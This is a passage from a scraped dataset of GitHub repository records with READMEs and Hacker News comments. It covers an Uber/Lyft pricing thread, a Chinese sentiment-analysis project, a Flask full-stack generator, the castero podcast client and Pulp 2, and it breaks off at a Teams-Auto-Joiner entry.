margins are probably 20%, you are scalping the drivers and no driver can exist successfully living off brokered rides alone, Uber and Lyft will price like CH Robinson. 25.\n Uber and Lyft Are Out of Ideas, Jacking Up Prices in Desperation for Profit (vice.com)\n 127 points by elsewhen 2 hours ago | flag | hide | 179 comments\n\nAbove is what I saw on the HN front page minutes ago. Then I started reading the comments thread and suddenly the submitted article has changed. It is now pointing to WSJ instead of VICE.Looks like the original VICE article has even been scrubbed from HN entirely.https://news.ycombinator.com/from?site=vice.comBelow is the original article.https://www.vice.com/en/article/m7vmpb/uber-and-lyft-are-out...\u201cI\u2019m not loyal,\u201d said Sergio Avedian, who has driven for seven apps, including Uber and Lyft, and writes about his experience on The RideShare Guy blog for drivers. \u201cNobody is loyal.\u201d> the current business model passes off nearly all of the costs of actually running a taxi company onto drivers who pay for their own cars, fuel, and insurance, whereas AVs would have meant both companies would be paying for those things, but that\u2019s a moot point nowI know that Vice is a meme these days, but I can't resist. Where do they think the money is going? Mostly to the fees that are paid to drivers. If those costs are baked in and they are still losing money, it's because they're paying the drivers more than they can afford. They were banking on not having to pay AV drivers wages, sick leave, pensions, have them go on strike, etc etc. Just provide customers a good service for an amount these companies could sustain.Now, that was a wild bet for sure, but not a bad one for humanity to have tried.Here's my question: how much will this hurt AWS? Oh, Uber and Lyft alone won't, of course, even though IIRC their IPO's revealed staggering AWS bills. But, there are a lot of goofy ideas out there masquerading as companies, and the VC spigot just turned off. That spigot was pushing VC money, via a very complex system of middlemen, to AWS.If AWS has half their customers disappear, what does that do to Amazon's bottom line?Of course they need to make money, they cant subsidise everyone foreverUrl changed from https://www.vice.com/en/article/m7vmpb/uber-and-lyft-are-out..., which points to this.I don't use Uber. In my country we have a taxi app which can be used by any taxi driver. So I do have the benefits of Uber - using an app, having a larger pool of drivers to pick from, paying the ride through the app, without any of the downsides of using Uber.The taxi drivers follow local regulations, they have the proper permit to transport people (this requires checking), I don't see ridicoluos price surges and price hikes at rush hours, taxi companies don't evade local taxes like Uber does, the money remain in the local economy, drivers have wages, social insurance, health insurance and pension funds.Uber and Lyft already dumped their bags on your 401k.Former Lyft engineer here. I'm convinced they will go out of business or sell the scraps to someone... however smart acquirers like Elon wouldn't go near it. Rideshare sucks.If you\u2019re arriving at an airport or other high traffic area, you will almost always get a better price and timelier service by simply jumping in a standard taxi. I\u2019d say this has been the case for at least 6-9 months.https://archive.ph/bt3bAI think we need to stop comparing Uber to Lyft. To me, this is more of a Lyft problem as Uber has diversified way more.I've had over 10,000 Uber rides, all black, some SUV since 2011. I would have no problem if they just focused on the higher end of the market where there's profit to be made. I never thought their going down market was a good idea.These companies were always net value destroyers. Consumers being subsidized from the pockets of investors was nice while it lasted, but it doesn't make for a sustainable business. Once they go to zero we'll wonder how it ever even appeared to make sense.This was always the idea. I remember Jason Calacanis saying on This Week In Startups months ago that Uber is in growth mode, eventually when push comes to shove they'll increase the price to get to profitability and have the market share to stick it out.Increased by how much?Uber is just a dumpster fire. I scheduled an airport ride with them and each driver continuously just kept canceling it when they saw where it was going. Can't imagine how bad it is for someone going to a lower level neighborhood.Can't count on it anymore - going back to manually calling taxis.I just do not understand how ridesharing cannot turn a profit. Let's look at unit economics:~25% take rate on a ride ($15 average): $3.75 takePayment processing: 2.5% + 30c = $0.68Servers / datacenters: $0.20 (for a margin-sensitive business, you should be colo'ing your own servers, or using cheap alternatives like OVH/Hertzner)Customer support: Automate as much as possible (auto refunds up to a certain point; for lost items, connect directly to driver); assume 1 in 50 rides require manual human support with a $3 cost = $0.06 support cost per rideFraud/refunds: Assume a 2% fraud rate that cannot be reclaimed; thus $0.30 cost for fraud. Refunds for things like driver purposefully took a longer route can be clawed from the driver.Gross COGS: $1.24Gross profit: $2.51What am I missing?? Marketing? Fuck marketing when you can't turn a profit. Everyone knows about Uber or Lyft already, you need to turn a profit, not waste $30 per CAC.I recently got a ridiculous coupon code for 50% off Postmates (Uber Eats) orders, when I did a Google search for Postmates. 5 orders, up to $100 savings on each order, and the code worked on my wife's account too so we get 10 orders. For weeks I've been ordering $200 meals from fancy steakhouses and paying $100, with leftovers for days. Somehow they haven't stopped subsidizing their customers yet.The code is FEAST if anyone cares to try it. Probably expired by now. It doesn't seem to work on Uber Eats, only Postmates.com on desktop web.So have they hit price-parity with traditional taxis, yet?After Uber and Lyft will fall, I can see a better model coming up.An open source base for a riding/taxi app for which local companies can add their own modules for billing to comply with local regulations.It would be the WordPress of ride sharing / taxi apps.I've been noticing more drivers going independent. When I landed at LAX recently and waited at the taxi area for a Lyft, there were a bunch of drivers coming up and offering people rides, but not through Uber or Lyft. I thought \"why not\", took one of these independent rides home, and paid the guy through Square. It wasn't a \"cheap\" ride, but it was cheaper than the Lyft ride I cancelled and I'm sure he made a greater profit than through a \"ride share\" company.That's just one example, but I've noticed this drastically increase in the last year. Whether I'm at the airport, a train station, or a bus depot, I've been seeing way more independent drivers.What's stopping more drivers from doing this? If it's the \"trust\" aspect that comes from Uber, then surely there's some system that can meet us halfway that doesn't apparently need large sums of VC money and high fees but at least provides trust and safety for riders.So does this mean it's going to begin to become cheaper to use the services of old taxi organizations, who arguably aren't going to have the shareholders to appease to to pad revenues with profits?I really think, in all cases of online platforms, that laws requiring the platform to be transparent with all costs - including how much they keep as a platform, how much they give the actual driver, how much the restaurant gets (if doing delivery) etc. would be highly beneficial, if not necessary, to not only society but also to potential investors.E.g. How sustainable are their prices, and are the billions invested simply subsidizing lower fares to outcompete based on price for a temporary time while fighting over to capture as much of a market (artificially and temporarily?) until the shareholders come knocking asking for the profit tap to get turned on?Here in India, its increasingly starting to feel that both Ola and Uber are slowly abandoning the market. Service quality has gone down drastically and Ola seems more interested in making (unsafe) electric scootersIn their heyday, you\u2019d drive around and find that 30-40% of cars on the road were Uber/Ola taxis (cabs here have different colored number plates). Now, its around 5-10%Seems unsurprising. The check had to come due eventually. It\u2019ll be interesting to see whether riders keep using it in enough volume to keep them afloat.So they made a full circle ... back to taxis?> The fundamental problem Uber and Lyft keep running into is that most people are not willing to pay the fares it would cost to run a profitable taxi service with the overhead Uber and Lyft require[surprisedpikachu.gif]This was inevitable without automation right?Western countries have such a weird problemA seemingly boring business seems unviable.For example, food is expensive, and we have to tip, but restaurant is tough business, and the servers don't make enough for living. Like why the heck is this not viable?At markets where Uber has competition. I know Brazil and Mexico. DiDi pays driver more and charges client less. So DiDi takes less cut than Uber and is still profitable.Are traditional taxicab services still alive? How did they survive until this time?I wonder how much of this transfers to the music industry. It's much more complicated than the taxi industry, but in broad strokes, VC-subsidized companies basically undercut the combination of record publishers and musicians, setting the price and revenue-per-listen to levels much lower than they would have been without subsidization. But it's also been happening for longer, so I think that it's more like as-if all the taxi drivers had already been driven out of the business and the taxis junked. With taxis, you know if there are no rides available, but with music, you don't really realize all the great music that isn't being written.I love threads like this. It assured me of job security in accounting y'all. Thanks for giving me confidence in strange quarters.I always figured by now there would be some sort of centralized \"trust\" entity, ala credit bureaus, where you can build apps on top of that using the same \"trust\".Supposing such a thing existed, then drivers could simply offer their own driving services by themselves. Perhaps that's the next evolution here.I used to drive a pretty boring, but predictable route in the morning and in the late afternoon. I would've loved to drive people who are near my destination both ways, but without anyway to trust them, no way.Surely someone has tried to implement this before and failed and I just don't know?I can proudly say that I've NEVER ONCE used these NeoSlavery services and never will.There's a talk a couple years old now by an Uber engineer called something like \"what I wish I knew before scaling to 10k microservices\", I haven't watched it in a while but when I saw it I remember thinking \"these people are absolutely insane\". I've since heard some crazy stories about things like new services being built because people would rather build a new service than talk to the devs that owned the existing one. I don't know if this is true or not or how widespread this was, but the impression I get is that Uber has massively over-built in an effort to look more like a \"tech\" company rather than a \"taxi\" company to investors.We have a couple of local companies in NY with their own ride-sharing apps. They aren't as polished as Uber, but they do work and the companies that built them have about 1% the staff of Uber.VCs are never getting this money back.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "linguishi/chinese_sentiment", "link": "https://github.com/linguishi/chinese_sentiment", "tags": [], "stars": 518, "description": "\u4e2d\u6587\u60c5\u611f\u5206\u6790\uff0cCNN\uff0cBI-LSTM\uff0c\u6587\u672c\u5206\u7c7b", "lang": "Python", "repo_lang": "", "readme": "# Chinese sentiment analysis\n\nThe essence of Chinese sentiment analysis is the problem of text classification. This project uses **CNN** and **BI-LSTM** two models to solve text classification tasks, and use them for sentiment analysis to achieve good results.\nThe two models are trained on a small data set, and the accuracy rate, number return rate and F1 factor in the verification set are close to **90%**\n\nThe goal of the project design is to accept multiple classification tasks from different corpora. As long as the corpus is prepared in a specific format, parameter adjustment training, export, and serving can begin.\n\n### code environment\nWorks fine under python3.6 & Tensorflow1.13\n\nOther environments may also work, but have not been tested.\n\nYou also need to install the `scikit-learn` package to calculate metrics, including precision-recall and F1 factors, etc.\n\n### Corpus preparation\nThe choice of corpus is *Tan Songbo\u2019s commentary corpus*, with 2000 positive and negative examples each. Belonging to a smaller dataset, this project contains the original corpus, located in `data/hotel_comment/raw_data/corpus.zip`\n\nRun after decompressing `corpus.zip`, and run it on `raw_data`\n```sh\npython fix_corpus.py\n```\nConvert the original `gb2312` encoded file to `utf-8` encoded file.\n\n### Preparation of word vector\nThis experiment uses open source word vectors [*chinese-word-vectors*](https://github.com/Embedding/Chinese-Word-Vectors)\n\nSelect the Word Vector trained by Zhihu corpus. The download address of the selected word vector for this project is https://pan.baidu.com/s/1OQ6fQLCgqT43WTwh5fh_lg, which needs to be downloaded from Baidu Cloud, decompressed, and placed directly in the project directory\n\n### Format of training data\nRefer to `data/hotel_comment/*.txt` files\n\n- step1\n\nThis project divides the data into training set and test set, the ratio is `4:1`, the set of 4000 samples is separated, the training set of 3200 samples, and the verification set of 800.\n\nFor the training set and validation set, follow the format below when making training data:\nIn the `{}.words.txt` file, each line is an input of a sample, and each paragraph is commented on a line, and `jieba` is used to divide words, and words are separated by spaces.\n```text\nExcept for the good location, the others are in a mess and appalling. Almost like a guest house.\nI booked a hotel for my colleague. His brother just came back from Dongguan, and I asked him about his impression of Guangdong Hotel in detail. He said that the hardware and software are excellent! So I would like to praise it\n```\nIn the `{}.labels.txt` file, each line is a label for a sample\n```text\nNEG\nPOS\n```\nIn this project, you can run `build_data.py` in the `data/hotel_comment` directory to get the corresponding format\n\n-step2\n\nBecause this project uses `index_table_from_file` to obtain the id corresponding to the character, two files are required to represent the vocabulary set and the flag set, corresponding to `vocab.labels.txt` and `vocab.words.txt`, where each line represents a word Or a row for a flag.\n\nIn this project, you can run `build_vocab.py` in the `data/hotel_comment` directory to get the corresponding files\n\n- step3\n\nSince the downloaded word vector is very huge, it is necessary to extract the vector corresponding to the characters appearing in the training corpus, which corresponds to the `data/hotel_comment/w2v.npz` file in this project\n\nIn this project, you can run `build_embeddings.py` in the `data/hotel_comment` directory to get the corresponding files\n\n## Model 1: CNN\n#### Structure:\n1. Chinese word Embedding\n2. Multiple fixed-width convolution kernels of different lengths\n3. The maximum pooling layer, each filter output only takes a maximum value\n4. Fully connected\n\n ![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/%E6%88%AA%E5%9B%BE_%E9%80%89%E6%8B%A9%E5% 8C%BA%E5%9F%9F_20211202181126.png)\nThe picture comes from the paper https://arxiv.org/abs/1408.5882 , but unlike the paper, the paper adopts a pre-train embeddings and an untrained embeddings to form a dual channel similar to the image concept. Only a single channel of pre-trained embeddings is used in this project.\n\nCNN model training, run under the `cnn` directory\n```\npython main.py\n```\n\n#### CNN model training time\nIt takes about 2 minutes under the blessing of **GTX 1060 6G**\n\n#### CNN model training results\nRun under the `model` directory\n\n```\npython score_report.py cnn/results/score/eval.preds.txt\n```\n\noutput:\n```\n precision recall f1-score support\n\n POS 0.91 0.87 0.89 400\n NEG 0.88 0.91 0.89 400\n\n micro avg 0.89 0.89 0.89 800\n macro avg 0.89 0.89 0.89 800\nweighted avg 0.89 0.89 0.89 800\n\n```\n\n## Model 2: BI-LSTM\n1. Chinese word Embedding\n2. bi-lstm\n3. Fully connected\n\n![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/1_GRQ91HNASB7MAJPTTlVvfw.jpeg)\n\n\nBI-LSTM model training, run under the `lstm` directory\n```\npython main.py\n```\n\n#### BI-LSTM model training time\nIt took about 5 minutes under the blessing of **GTX 1060 6G**\n\n#### BI-LSTM model training results\nRun under the `model` directory\n\n```\npython score_report.py lstm/results/score/eval.preds.txt\n```\n\noutput:\n```\n precision recall f1-score support\n\n POS 0.90 0.87 0.88 400\n NEG 0.87 0.91 0.89 400\n\n micro avg 0.89 0.89 0.89 800\n macro avg 0.89 0.89 0.89 800\nweighted avg 0.89 0.89 0.89 800\n\n```\n\n### Model export and serving (BI-LSTM as an example)\n#### Model Export\nRun under the `lstm` directory\n```\npython export.py\n```\nExport `estimator` inference graph, which can be used as prediction. This project has uploaded `saved_model`, which can be tested directly without training.\n\nRun `python serve.py` under the `model/lstm` directory to use the exported model for entity recognition. See code for details.\n\nTest Results\n\n![Screenshot](https://raw.githubusercontent.com/linguishi/chinese_sentiment/master/pic/clip.png)\n\nAlthough the model is trained from real comment data, the length of these data varies (some word segmentation length exceeds 1000), but from the above figure, the model can perform well on short comments.\n\n ## refer to\n \n [1] http://www.wildml.com/2015/12/implementing-a-cnn-for-text-classification-in-tensorflow/\n \n [2] https://arxiv.org/abs/1408.5882", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "tiangolo/full-stack", "link": "https://github.com/tiangolo/full-stack", "tags": ["python", "flask", "docker", "traefik", "letsencrypt", "swagger", "celery", "sqlalchemy", "api", "jwt", "angular", "cookiecutter", "generator", "swarm-mode", "token-authetication", "webargs", "marshmallow", "postgresql", "pgadmin", "apispec"], "stars": 515, "description": "Full stack, modern web application generator. Using Flask, PostgreSQL DB, Docker, Swagger, automatic HTTPS and more.", "lang": "Python", "repo_lang": "", "readme": "## \ud83d\udea8 DEPRECATION WARNING \ud83d\udea8\n\nAs [**FastAPI**](https://github.com/tiangolo/fastapi) and the [equivalent project generator](https://github.com/tiangolo/full-stack-fastapi-postgresql) provide a much better solution to all the use cases this project was built for, all the future development will be done there.\n\nYou are still free to use this project, but it won't receive any new features, changes, or bug fixes.\n\nIf you are starting a new project from scratch, check the alternatives at the [FastAPI docs: Project Generation](https://fastapi.tiangolo.com/project-generation/).\n\n# Full Stack Flask and PostgreSQL - Base Project Generator\n\n[![Build Status](https://travis-ci.org/tiangolo/full-stack.svg?branch=master)](https://travis-ci.org/tiangolo/full-stack)\n\nGenerate a backend and frontend stack using Python, including interactive API documentation.\n\n[![Screenshot](screenshot.png)](https://github.com/tiangolo/full-stack)\n\n## Notice: Flask or [FastAPI](https://github.com/tiangolo/fastapi)\n\nIf you are using this project (or Flask in general to create web APIs) you would probably benefit more from [FastAPI](https://github.com/tiangolo/fastapi).\n\nYou can use the equivalent sibling project generator based on **FastAPI**: [https://github.com/tiangolo/full-stack-fastapi-postgresql](https://github.com/tiangolo/full-stack-fastapi-postgresql). It also has more features than this one.\n\n**FastAPI** was created from the learnings acquired while creating and using these project generators for Flask, with all the plug-ins and ideas.\n\n* **FastAPI** (and its project generators), would give you about 800% (8x) the performance achievable with this one.\n* Writing code in **FastAPI** is about 200% to 300% faster. Because you write a lot less code, it is designed for web APIs, and you have auto-complete everywhere.\n* About 40% of the human (developer) induced errors can be reduced (**FastAPI** does a lot of the data validation, conversion and documentation for you).\n\n---\n\n## Features\n\n* Full **Docker** integration (Docker based)\n* Docker Swarm Mode deployment\n* **Docker Compose** integration and optimization for local development\n* **Production ready** Python web server using Nginx and uWSGI\n* Python **Flask** backend with:\n * **Flask-apispec**: Swagger live documentation generation\n * **Marshmallow**: model and data serialization (convert model objects to JSON)\n * **Webargs**: parse, validate and document inputs to the endpoint / route\n * **Secure password** hashing by default\n * **JWT token** authentication\n * **SQLAlchemy** models (independent of Flask extensions, so they can be used with Celery workers directly)\n * Basic starting models for users and groups (modify and remove as you need)\n * **Alembic** migrations\n * **CORS** (Cross Origin Resource Sharing)\n* **Celery** worker that can import and use models and code from the rest of the backend selectively (you don't have to install the complete app in each worker)\n* REST backend tests based on **Pytest**, integrated with Docker, so you can test the full API interaction, independent on the database. As it runs in Docker, it can build a new data store from scratch each time (so you can use ElasticSearch, MongoDB, CouchDB, or whatever you want, and just test that the API works)\n* Easy Python integration with **Jupyter Kernels** for remote or in-Docker development with extensions like Atom Hydrogen or Visual Studio Code Jupyter\n* Vue frontend:\n * Generated with **Vue CLI**\n * JWT Authentication handling\n * Login view\n * After login, main dashboard view\n * **Vuex**\n * **Vue-router**\n * **Vuetify** for beautiful material design components\n * **TypeScript**\n * Docker server based on **Nginx** (configured to play nicely with Vue-router)\n * Docker multi-stage building, so you don't need to save or commit compiled code\n * Frontend tests ran at build time (can be disabled too)\n * Made as modular as possible, so it works out of the box, but you can re-generate with Vue CLI or create it as you need, and re-use what you want\n* **PGAdmin** for PostgreSQL database, you can modify it to use PHPMyAdmin and MySQL easily\n* **Swagger-UI** for live interactive documentation\n* **Flower** for Celery jobs monitoring\n* Load balancing between frontend and backend with **Traefik**, so you can have both under the same domain, separated by path, but served by different containers\n* Traefik integration, including Let's Encrypt **HTTPS** certificates automatic generation\n* **GitLab CI** (continuous integration), including frontend and backend testing\n\n## How to use it\n\nGo to the directoy where you want to create your project and run:\n\n```bash\npip install cookiecutter\ncookiecutter https://github.com/tiangolo/full-stack\n```\n\n### Generate passwords\n\nYou will be asked to provide passwords and secret keys for several components. Open another terminal and run:\n\n```bash\nopenssl rand -hex 32\n# Outputs something like: 99d3b1f01aa639e4a76f4fc281fc834747a543720ba4c8a8648ba755aef9be7f\n```\n\nCopy the contents and use that as password / secret key. And run that again to generate another secure key.\n\n\n### Input variables\n\nThe generator (cookiecutter) will ask you for some data, you might want to have at hand before generating the project.\n\nThe input variables, with their default values (some auto generated) are:\n\n* `project_name`: The name of the project\n* `project_slug`: The development friendly name of the project. By default, based on the project name\n* `domain_main`: The domain in where to deploy the project for production (from the branch `production`), used by the load balancer, backend, etc. By default, based on the project slug.\n* `domain_staging`: The domain in where to deploy while staging (before production) (from the branch `master`). By default, based on the main domain.\n\n* `docker_swarm_stack_name_main`: The name of the stack while deploying to Docker in Swarm mode for production. By default, based on the domain.\n* `docker_swarm_stack_name_staging`: The name of the stack while deploying to Docker in Swarm mode for staging. By default, based on the domain.\n\n* `secret_key`: Backend server secret key. Use the method above to generate it.\n* `first_superuser`: The first superuser generated, with it you will be able to create more users, etc. By default, based on the domain.\n* `first_superuser_password`: First superuser password. Use the method above to generate it.\n* `backend_cors_origins`: Origins (domains, more or less) that are enabled for CORS (Cross Origin Resource Sharing). This allows a frontend in one domain (e.g. `https://dashboard.example.com`) to communicate with this backend, that could be living in another domain (e.g. `https://api.example.com`). It can also be used to allow your local frontend (with a custom `hosts` domain mapping, as described in the project's `README.md`) that could be living in `http://dev.example.com:8080` to cummunicate with the backend at `https://stag.example.com`. Notice the `http` vs `https` and the `dev.` prefix for local development vs the \"staging\" `stag.` prefix. By default, it includes origins for production, staging and development, with ports commonly used during local development by several popular frontend frameworks (Vue with `:8080`, React, Angular).\n \n* `postgres_password`: Postgres database password. Use the method above to generate it. (You could easily modify it to use MySQL, MariaDB, etc).\n* `pgadmin_default_user`: PGAdmin default user, to log-in to the PGAdmin interface.\n* `pgadmin_default_user_password`: PGAdmin default user password. Generate it with the method above.\n \n* `traefik_constraint_tag`: The tag to be used by the internal Traefik load balancer (for example, to divide requests between backend and frontend) for production. Used to separate this stack from any other stack you might have. This should identify each stack in each environment (production, staging, etc).\n* `traefik_constraint_tag_staging`: The Traefik tag to be used while on staging. \n* `traefik_public_network`: This assumes you have another separate publicly facing Traefik at the server / cluster level. This is the network that main Traefik lives in.\n* `traefik_public_constraint_tag`: The tag that should be used by stack services that should communicate with the public.\n\n* `flower_auth`: Basic HTTP authentication for flower, in the form`user:password`. By default: \"`root:changethis`\".\n\n* `sentry_dsn`: Key URL (DSN) of Sentry, for live error reporting. If you are not using it yet, you should, is open source. E.g.: `https://1234abcd:5678ef@sentry.example.com/30`.\n\n* `docker_image_prefix`: Prefix to use for Docker image names. If you are using GitLab Docker registry it would be based on your code repository. E.g.: `git.example.com/development-team/my-awesome-project/`.\n* `docker_image_backend`: Docker image name for the backend. By default, it will be based on your Docker image prefix, e.g.: `git.example.com/development-team/my-awesome-project/backend`. And depending on your environment, a different tag will be appended ( `prod`, `stag`, `branch` ). So, the final image names used will be like: `git.example.com/development-team/my-awesome-project/backend:prod`.\n* `docker_image_celeryworker`: Docker image for the celery worker. By default, based on your Docker image prefix.\n* `docker_image_frontend`: Docker image for the frontend. By default, based on your Docker image prefix.\n\n## How to deploy\n\nThis stack can be adjusted and used with several deployment options that are compatible with Docker Compose, but it is designed to be used in a cluster controlled with pure Docker in Swarm Mode with a Traefik main load balancer proxy handling automatic HTTPS certificates, using the ideas from DockerSwarm.rocks.\n\nPlease refer to DockerSwarm.rocks to see how to deploy such a cluster in 20 minutes.\n\n## More details\n\nAfter using this generator, your new project (the directory created) will contain an extensive `README.md` with instructions for development, deployment, etc. You can pre-read [the project `README.md` template here too](./{{cookiecutter.project_slug}}/README.md).\n\n## History\n\n**Note about Angular**: a previous version of this project generated a basic default Angular frontend application, but without any view or interaction with the rest of the stack (the backend API). I recently switched to Vue for frontend and used it to created the basic frontend views for this project (that didn't exist before). If you are interested in keeping the Angular version, let me know in an issue, I can create an Angular version of the project (without the current default views), then you can integrate your Angular app with the basic `Dockerfile` and additional files.\n\nThis project was based on [senseta-os/senseta-base-project](https://github.com/senseta-os/senseta-base-project).\n\nAs [I was the only maintainer](https://github.com/tiangolo), I'm continuing the development in this fork (https://github.com/tiangolo/full-stack).\n\n## License\n\nThis project is licensed under the terms of the MIT license.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "xgi/castero", "link": "https://github.com/xgi/castero", "tags": ["podcast-client", "podcast", "command-line", "terminal", "tui", "curses", "hacktoberfest"], "stars": 515, "description": "TUI podcast client for the terminal", "lang": "Python", "repo_lang": "", "readme": "# castero\n\n[![GitHub release](https://img.shields.io/github/release/xgi/castero.svg?style=flat-square)](https://github.com/xgi/castero/releases) [![PyPI](https://img.shields.io/pypi/v/castero.svg?style=flat-square)](https://pypi.org/project/castero) [![GitHub Build](https://img.shields.io/github/workflow/status/xgi/castero/CI?style=flat-square)](https://circleci.com/gh/xgi/castero/tree/master) [![Maintainability](https://api.codeclimate.com/v1/badges/babcaad5cb2cca266c92/maintainability)](https://codeclimate.com/github/xgi/castero/maintainability) [![Test Coverage](https://api.codeclimate.com/v1/badges/babcaad5cb2cca266c92/test_coverage)](https://codeclimate.com/github/xgi/castero/test_coverage)\n\ncastero is a TUI podcast client for the terminal.\n\n![example client screenshot](https://raw.githubusercontent.com/xgi/castero/master/res/client_example.png)\n\n## Installation\n\nInstall from [PyPi](https://pypi.org/project/castero) with pip:\n\n```bash\n$ pip3 install castero\n```\n\nUpgrading:\n\n```bash\n$ pip3 install castero --upgrade\n```\n\n### Manual Installation\n\n```bash\n$ git clone https://github.com/xgi/castero\n$ cd castero\n$ sudo python setup.py install\n```\n\n## Dependencies\n\nRunning castero requires the following external dependencies:\n\n* Python >= 3.5 (check the output of ``python --version``)\n* sqlite3\n* At least one of the following media players:\n * vlc >= 2.2.3\n * (mpv and libmpv) >= 0.14.0\n \n## Usage\n\nAfter installing castero, it can be run with simply:\n\n```bash\n$ castero\n```\n\nThe help menu provides a list of controls and can be accessed by pressing\nh. Alternatively, see the list below:\n\n```text\nCommands\n h - show this help screen\n q - exit the client\n a - add a feed\n d - delete the selected feed\n r - reload/refresh feeds\n s - save episode for offline playback\n UP/DOWN - navigate up/down in menus\n RIGHT/LEFT - navigate right/left in menus\n PPAGE/NPAGE - scroll up/down in menus\n ENTER - play selected feed/episode\n SPACE - add selected feed/episode to queue\n c - clear the queue\n n - go to the next episode in the queue\n i - invert the order of the menu\n / - filter the contents of the menu\n m - mark episode as played/unplayed\n p or k - pause/play the current episode\n f or l - seek forward\n b or j - seek backward\n =/- - increase/decrease volume\n ]/[ - increase/decrease playback speed\n u - show episode URL\n 1-5 - change between client layouts\n```\n\n### Importing/exporting feeds from another client\n\ncastero supports importing and exporting an [OPML file](https://en.wikipedia.org/wiki/OPML)\nof your subscriptions in order to easily transfer them between other podcast\nclients. Please refer to your other client's documentation for details on\nhow/if it supports this format.\n\nImporting and exporting from castero are available with command line flags.\nRun `castero --help` for details.\n\n## Configuration\n\nThe configuration file is located at `{HOME}/.config/castero/castero.conf`\nafter the client has been run at least once.\n\nPlease see the [default castero.conf](https://github.com/xgi/castero/blob/master/castero/templates/castero.conf)\nfor a list of available settings.\n\nUser data, including downloaded episodes and a database with your feed\ninformation, is located at `{HOME}/.local/share/castero/`. These files are not\nintended to be manually modified. Removing the database will simply cause\ncastero to replace it with an empty one the next time you run the client.\n\n## Testing\n\nThis project uses [pytest](https://pytest.org) for testing. To run tests, run\nthe following command in the project's root directory:\n\n```bash\n$ python -m pytest tests\n```\n\nYou can also run tests for an individual unit, i.e.:\n\n```bash\n$ python -m pytest tests/test_feed.py\n```\n\n## License\n\n[MIT License](https://github.com/xgi/castero/blob/master/LICENSE.txt)\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "pulp/pulp", "link": "https://github.com/pulp/pulp", "tags": [], "stars": 515, "description": "\u26d4\ufe0fPulp2 is EOL! \u26d4\ufe0fPulp 2 platform code, including the server and base admin and consumer clients", "lang": "Python", "repo_lang": "", "readme": ":warning: \u26d4\ufe0f Pulp2 is EOL as of November 30 2022, for more info visit this link https://pulpproject.org/2022/09/19/pulp-2-eol/. \u26d4\ufe0f\n\nPulp is a platform for managing repositories of content, such as software\npackages, and pushing that content out to large numbers of consumers.\n\nFor more information, check out the project website:\n\nhttp://www.pulpproject.org\n", "readme_type": "text", "hn_comments": "Clickable links: https://terminusdb.com/ https://github.com/GavinMendelGleason/blog/blob/main/entries...The author is pessimistic about Beeper's future. They will be happy to learn that the EU will basically force messaging interoperability in the next 2 years:https://techcrunch.com/2022/03/24/dma-political-agreement/Good honest comments as to why such an app is not possible.https://www.theregister.com/2023/02/10/googles_go_programmin...\nhttps://github.com/golang/go/discussions/58409I mean, I wasn\u2019t really surprised here, with this being Google always finding ways to collect data on just about anything to make money.Remember, cooperations don\u2019t give a crap about you at all when it comes to profits and headcount, so it isn\u2019t worth signing up and investing a huge amount of your \u2018dreams\u2019 to \u2018get into a corporation\u2019 all to get exploited and used in the end.Go team, Kubernetes Team or any team or product by a corporation is all motivated by profit and a good image and nothing else.I am sure engineers these days are smart enough to see patterns in data, puzzles or solving problems by creating algorithms, they must be also smart enough not to be na\u00efve to think that companies care about them.You seem way too invested into1. a programming language2. the telemetry proposalI like Go, I would never use the words \"hopes and dreams\" to refer to it (or any other language). And the telemetry proposal isn't as apocalyptic as you're making it out to be either.Why the drama. This seems more like a personal emotional regulation problem than anything else.This situation is morally a bit muddled. For that reason, it is not a \"teachable moment\". I'd let this slide.GPLv3 vs BSDIf it matters hire a lawyer because there's no GNU Enforcement Agency.Not that I don't love GPL philosophically, but copy-left is only as strong as the good-will of others and my willingness to lawyer up against people who violate it.Good luck.1. The person who submitted the pull request is about to cause that other project to violate your copyright, which will cause it significant inconvenience if discovered. Regardless of whether the student making that pull request understands what they're doing, I think it would be good to warn the project.2. If you want the upstream project to benefit from your code, you might consider selectively re-licensing that portion of it under the same licence (or a compatible one). This should include appropriate boilerplate headers and/or SPDX identifiers, if upstream uses them.3. An appropriately phrased warning will benefit the student, who has the opportunity to learn the basics of copyright before they accidentally copy a few thousand lines of code from somebody with a legal department.--edit: I believe I've located the project and PR in question. Given the context in the thread, if you decide that you're OK with code from your implementation being used as-is under the terms of the BSD license then I think a comment to that effect in the PR would be helpful to all involved.NoI'd say don't bother because you can implement this functionality as a separate program.I don't know whether or not it would be rejected, but it seems to me like a reasonable addition. Go for it.3 possibilities:1. It gets accepted. People who don't care about it can ignore it. People who want to take advantage of it will. You get bragging rights, you benefit, and others benefit.2. It gets rejected. Assuming your proposed patch is made public, then it will be of benefit to someone who wants to include it themself in their own build, and it can serve as an educational aid to someone who wants to understand the codebase more. You can still point to the PR as evidence of your activity and support for FOSS software. You still benefit, and it may benefit others, depending on their activity.3. You don't submit the PR at all. You benefit from the personal knowledge that you gained, but it is very difficult to demonstrate/prove that to anyone, and any work that you did will not benefit anyone else.In other words, just do it. That's my suggestion. It's your life, and at the end of the year, would you rather have tried and failed, or let someone here talk you out of trying at all? Your only choice is whether or not to try. If you succeed, then that makes it even better. But DO NOT pass up opportunities to try to do things like this.Context: I just had the same opportunity, but with Manim, so I decided to record the process (it's now on YouTube), and I submitted the PR to Manim last night.The GNU core utils mailing list is probably a better place to ask...https://savannah.gnu.org/mail/?group=coreutils", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "TobiasPankner/Teams-Auto-Joiner", "link": "https://github.com/TobiasPankner/Teams-Auto-Joiner", "tags": [], "stars": 515, "description": "Python script to automatically join Microsoft Teams meetings.", "lang": "Python", "repo_lang": "", "readme": "# Teams-Auto-Joiner\n[![GitHub stars](https://img.shields.io/github/stars/TobiasPankner/Teams-Auto-Joiner.svg?style=social&label=Star)](https://GitHub.com/TobiasPankner/Teams-Auto-Joiner/stargazers/)\n[![Donate](https://img.shields.io/badge/Donate-PayPal-green.svg)](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=3TU2XDBK2JFU4&source=url)\n\n- [Prerequisites](#prerequisites)\n- 